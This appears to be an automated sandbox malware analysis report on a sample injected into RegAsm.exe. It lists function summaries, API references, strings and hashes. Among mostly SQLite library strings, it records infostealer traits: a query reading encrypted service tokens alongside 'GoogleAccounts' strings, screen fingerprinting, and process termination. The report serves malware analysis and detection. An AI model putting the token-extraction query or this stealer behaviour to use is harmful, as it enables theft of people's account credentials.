Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-860711957
Opcode ID: 09af2e758f2ad7af352ac93ef5db4b8ed90e3730c774073e465867246a73adaa
Instruction ID: c763378585d80cb78c9f81bb6ddedcf46c79a5e4c28980df0720435871c4537d
Opcode Fuzzy Hash: 09af2e758f2ad7af352ac93ef5db4b8ed90e3730c774073e465867246a73adaa
Instruction Fuzzy Hash: 244179B2A443419BDB0C9E35EC45BD777E9AF81354F2C443CE4D69B382EA32E41583A2

Uniqueness

Uniqueness Score: -1.00%

Function 19D7B0E0 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 117COMMON

Download Yara Rule

Strings

API call with %s database connection pointer, xrefs: 19D7B0F9
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19D7B108
invalid, xrefs: 19D7B13E
NULL, xrefs: 19D7B0F4
misuse, xrefs: 19D7B112
unopened, xrefs: 19D7B145
%s at line %d of [%.10s], xrefs: 19D7B117

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API call with %s database connection pointer$NULL$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$invalid$misuse$unopened
API String ID: 0-538076154
Opcode ID: d111e7e0b8adf36ab3069cdfd608f2e5681317a47960773997f033481c2118ea
Instruction ID: 2927a4cb1fae9f9d72f2eec3adba37927159ff35681f205db7d4047caedad71e
Opcode Fuzzy Hash: d111e7e0b8adf36ab3069cdfd608f2e5681317a47960773997f033481c2118ea
Instruction Fuzzy Hash: E731CD75904384AFD7155A64DC00A8B7BA99F4532DF4C052CFEE562A81EB7DF501C393

Uniqueness

Uniqueness Score: -1.00%

Function 0040BF10 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 107stringmemoryCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(75B65460,?,75B65460,00000000,?,0040C0A5,0040C8C0,?,0040C8C0,?,75B65460,00000000), ref: 0040BF5F
strchr.MSVCRT ref: 0040BF75
strchr.MSVCRT ref: 0040BFA6
lstrlen.KERNEL32(75B65460,?,?,?,?,?,0040C0A5,0040C8C0,?,0040C8C0,?,75B65460,00000000), ref: 0040BFC6
GetProcessHeap.KERNEL32(00000008,-00000001,?,?,?,?,?,0040C0A5,0040C8C0,?,0040C8C0,?,75B65460,00000000), ref: 0040BFD7
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,0040C0A5,0040C8C0,?,0040C8C0,?,75B65460,00000000), ref: 0040BFDE
lstrlen.KERNEL32(75B65460,?,?,?,?,?,0040C0A5,0040C8C0,?,0040C8C0,?,75B65460,00000000), ref: 0040BFEE
strcpy_s.MSVCRT ref: 0040C01A

Strings

0123456789ABCDEF, xrefs: 0040BF2B

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrlen$Heapstrchr$AllocProcessstrcpy_s
String ID: 0123456789ABCDEF
API String ID: 4020929367-2554083253
Opcode ID: fd006f9b56bc7ef8a4b9ae5c8e524a07b9f310a438a39e7189a40d8a275efe6b
Instruction ID: 5966ea1f0e642e750bc4dd4ac55007b62af0bfa430af95c807717a58a61a9fb0
Opcode Fuzzy Hash: fd006f9b56bc7ef8a4b9ae5c8e524a07b9f310a438a39e7189a40d8a275efe6b
Instruction Fuzzy Hash: DE31B676A002059FC710DFA9DC45BAEBBB9EF8D714F40416AF919E7381D7389901CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 19D5FB30 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 324COMMON

Download Yara Rule

Strings

API called with NULL prepared statement, xrefs: 19D5FB65
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19D5FB96
misuse, xrefs: 19D5FBA0
API called with finalized prepared statement, xrefs: 19D5FB7A
%s at line %d of [%.10s], xrefs: 19D5FBA5

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-860711957
Opcode ID: 408c114430b8701d118f53c5c60f2ba114d957c1391a039c17e737a12bcb2058
Instruction ID: 32e65c1f3610dbfbc44315faf3009708cafd7d9099dff21717ffb4c76622e4c4
Opcode Fuzzy Hash: 408c114430b8701d118f53c5c60f2ba114d957c1391a039c17e737a12bcb2058
Instruction Fuzzy Hash: 69B1C2B49047419FEB108F38D845B5777F4BF44358F08496CE88B8BA81E776E4098BA2

Uniqueness

Uniqueness Score: -1.00%

Function 00411AA0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 105memoryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00411AD5
GetProcessHeap.KERNEL32(00000000,000000FA,?,00000000,?,004075E6,0040DC76), ref: 00411B06
HeapAlloc.KERNEL32(00000000,?,004075E6,0040DC76), ref: 00411B0D
wsprintfW.USER32 ref: 00411B1C
OpenProcess.KERNEL32(00001001,00000000), ref: 00411B7D
TerminateProcess.KERNEL32(00000000,00000000), ref: 00411B8C
CloseHandle.KERNEL32(00000000), ref: 00411B93

Strings

%hs, xrefs: 00411B16

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process$Heap$AllocCloseHandleOpenTerminatememsetwsprintf
String ID: %hs
API String ID: 396451647-2783943728
Opcode ID: 2a9af94ab51f1c7612f2706503fe0e7467de995d476e1fae5c9432b40af36c71
Instruction ID: 62e53cf01b74de85e867b82ad9f5ad143882cdd6a93c6f1169250ec35743cbe0
Opcode Fuzzy Hash: 2a9af94ab51f1c7612f2706503fe0e7467de995d476e1fae5c9432b40af36c71
Instruction Fuzzy Hash: BD31B2B6900209ABDB10DF94DC85FEFB779EF0A700F50412AF609A7190E7385E85CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 19CEBCF0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 103COMMON

Download Yara Rule

Strings

PRAGMA %Q.page_size, xrefs: 19CEBD03
undersize RTree blobs in "%q_node", xrefs: 19CEBDA1
SELECT length(data) FROM '%q'.'%q_node' WHERE nodeno = 1, xrefs: 19CEBD67

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID: PRAGMA %Q.page_size$SELECT length(data) FROM '%q'.'%q_node' WHERE nodeno = 1$undersize RTree blobs in "%q_node"
API String ID: 0-3485589083
Opcode ID: 123aa718fcfa50f0243ef338c0588c9cdf5def841a9ab708f9a1cc783df3876c
Instruction ID: 125de7214c467d066bde2f6e857854a5580b2ab49e3db9aeb70b500da804ab17
Opcode Fuzzy Hash: 123aa718fcfa50f0243ef338c0588c9cdf5def841a9ab708f9a1cc783df3876c
Instruction Fuzzy Hash: 38310B72E00252EFE7029B76EC84A677BA8EB44355F084125FC8A96311D735EA54CBF2

Uniqueness

Uniqueness Score: -1.00%

Function 00414500 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 88COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0041452E
memset.MSVCRT ref: 0041453A
GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,00000000), ref: 0041454F

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,014532E8,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

ShellExecuteEx.SHELL32(0000003C), ref: 004145F1
memset.MSVCRT ref: 004145FE
memset.MSVCRT ref: 00414610
ExitProcess.KERNEL32 ref: 00414621

Strings

<, xrefs: 004145C9

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: memset$lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
String ID: <
API String ID: 1943017432-4251816714
Opcode ID: fa61bad28b9fa6bf749e961c07963be30b3881d2093b9f200ee653d6053f849b
Instruction ID: 40106b6c34474a18d672d20360bd6d15e979737cd144eebdb7cb1047f618d409
Opcode Fuzzy Hash: fa61bad28b9fa6bf749e961c07963be30b3881d2093b9f200ee653d6053f849b
Instruction Fuzzy Hash: E43150B1C00248EBDB04EFA5CC91EEEBBB8AF19304F50415EF20577182DB785A48CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00410C10 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

CreateDCA.GDI32(014532F8,00000000,00000000,00000000), ref: 00410C2A
GetDeviceCaps.GDI32(00000000,00000008), ref: 00410C35
GetDeviceCaps.GDI32(00000000,0000000A), ref: 00410C40
ReleaseDC.USER32(00000000,00000000), ref: 00410C4B
GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000001,?,?,00415FBA,?,00000000,?,Display Resolution: ,00000000,?,00428460,00000000), ref: 00410C58
HeapAlloc.KERNEL32(00000000,?,?,00000001,?,?,00415FBA,?,00000000,?,Display Resolution: ,00000000,?,00428460,00000000,?), ref: 00410C5F
wsprintfA.USER32 ref: 00410C6F

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Strings

%dx%d, xrefs: 00410C69

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CapsDeviceHeap$AllocCreateProcessReleaselstrcpywsprintf
String ID: %dx%d
API String ID: 3940144428-2206825331
Opcode ID: fa3c6274f822142a20cc3ebfe296ed34c019a70a2d3d3122d6912a561d387fb8
Instruction ID: 10970bef041411397078d824575da1c8168c4890c013ef65725a28c434970ae3
Opcode Fuzzy Hash: fa3c6274f822142a20cc3ebfe296ed34c019a70a2d3d3122d6912a561d387fb8
Instruction Fuzzy Hash: D101D6357413107BE32027A5AC0EF5B7A9EEB0AB52F500015FB04D71D0CAB0180087E9

Uniqueness

Uniqueness Score: -1.00%

Function 19D432F0 Relevance: 12.7, APIs: 4, Strings: 3, Instructions: 464COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19D436B8, 19D436FD, 19D4375D, 19D4380E
database corruption, xrefs: 19D436C2, 19D43707, 19D43767, 19D43818
%s at line %d of [%.10s], xrefs: 19D436C7, 19D4370C, 19D4376C, 19D4381D

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: 1de916a61573115f6e1ac7d41e1dd424a8ef102e4c68aa72f0a98be6b78fa946
Instruction ID: 387f6a8bed04f7fce56ef0f9d8d703d73bc294801e1abca8dc3fd23a6cfebc6a
Opcode Fuzzy Hash: 1de916a61573115f6e1ac7d41e1dd424a8ef102e4c68aa72f0a98be6b78fa946
Instruction Fuzzy Hash: 2EF15774A046929FD701DF2CC984AA6FBF0FF44314F6C4559E8888BE91EB31E855CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 19CF9030 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 169COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19CF904F, 19CF9182, 19CF91B9, 19CF91E4
database corruption, xrefs: 19CF9059, 19CF918C, 19CF91C3, 19CF91EE
%s at line %d of [%.10s], xrefs: 19CF905E, 19CF9191, 19CF91C8, 19CF91F3

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: 121d00b062d968cfba68f308d3e987ec66de0b069ad8a187d770ec35fd040c05
Instruction ID: ddea2434740d42f884a67a7b4a44446c6e4a3de05708a3c967dda4a5469b2717
Opcode Fuzzy Hash: 121d00b062d968cfba68f308d3e987ec66de0b069ad8a187d770ec35fd040c05
Instruction Fuzzy Hash: CB514572304250ABC750EA19EC84AE7B7F0EB88225FAC8869F4CAC7791D735E545CB61

Uniqueness

Uniqueness Score: -1.00%

Function 19C49DA0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 160COMMON

Download Yara Rule

Strings

[%!g,%!g]], xrefs: 19C49EC0
[%!g,%!g],, xrefs: 19C49E7E

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID: [%!g,%!g],$[%!g,%!g]]
API String ID: 0-3388633204
Opcode ID: 36fe78861709bba3e23ab475300b591dfa730a397d1da57550a3c89f317639b6
Instruction ID: b1daff90fe0cf635617cebf32019f73001529e529c96c0b9e979dd63cc8ab3c0
Opcode Fuzzy Hash: 36fe78861709bba3e23ab475300b591dfa730a397d1da57550a3c89f317639b6
Instruction Fuzzy Hash: 59516B30A007119BE701DF65ECC5B9777B0BF42340F28862DFC899B291E771A585C792

Uniqueness

Uniqueness Score: -1.00%

Function 19C6F330 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 126COMMON

Download Yara Rule

Strings

INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');, xrefs: 19C6F33F
malformed inverted index for FTS%d table %s.%s, xrefs: 19C6F3F3
unable to validate the inverted index for FTS%d table %s.%s: %s, xrefs: 19C6F418

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');$malformed inverted index for FTS%d table %s.%s$unable to validate the inverted index for FTS%d table %s.%s: %s
API String ID: 0-2809892521
Opcode ID: e853114ab11dcb230621a0c5cf89ed3f5680b1c7077e48930eb16a72b49b0d28
Instruction ID: 807c9e38dc690006753de6b53e3fafa02906d3f141780d7b60d161ff5d95410b
Opcode Fuzzy Hash: e853114ab11dcb230621a0c5cf89ed3f5680b1c7077e48930eb16a72b49b0d28
Instruction Fuzzy Hash: 75410472D01262DBD712ABB5FC8CA5B37A8EF40395F084429FC89C2360DB21A554DBB2

Uniqueness

Uniqueness Score: -1.00%

Function 00408EB0 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 340stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,014532E8,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

Part of subcall function 004070D0: memcmp.MSVCRT ref: 0040710B
Part of subcall function 004070D0: memset.MSVCRT ref: 00407139
Part of subcall function 004070D0: LocalAlloc.KERNEL32(00000040,?), ref: 00407170

lstrlen.KERNEL32(00000000), ref: 00409105

Part of subcall function 00411750: LocalAlloc.KERNEL32(00000040,?,00000000,00000001,00000004,?,00413F63,00000000,00000000), ref: 0041176C

StrStrA.SHLWAPI(00000000,AccountId), ref: 0040912B
lstrlen.KERNEL32(00000000), ref: 00409214
lstrlen.KERNEL32(00000000), ref: 00409228

Strings

SELECT service, encrypted_token FROM token_service, xrefs: 00409069
AccountId, xrefs: 00409125
GoogleAccounts, xrefs: 00408F7A
GoogleAccounts, xrefs: 00408EF6

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
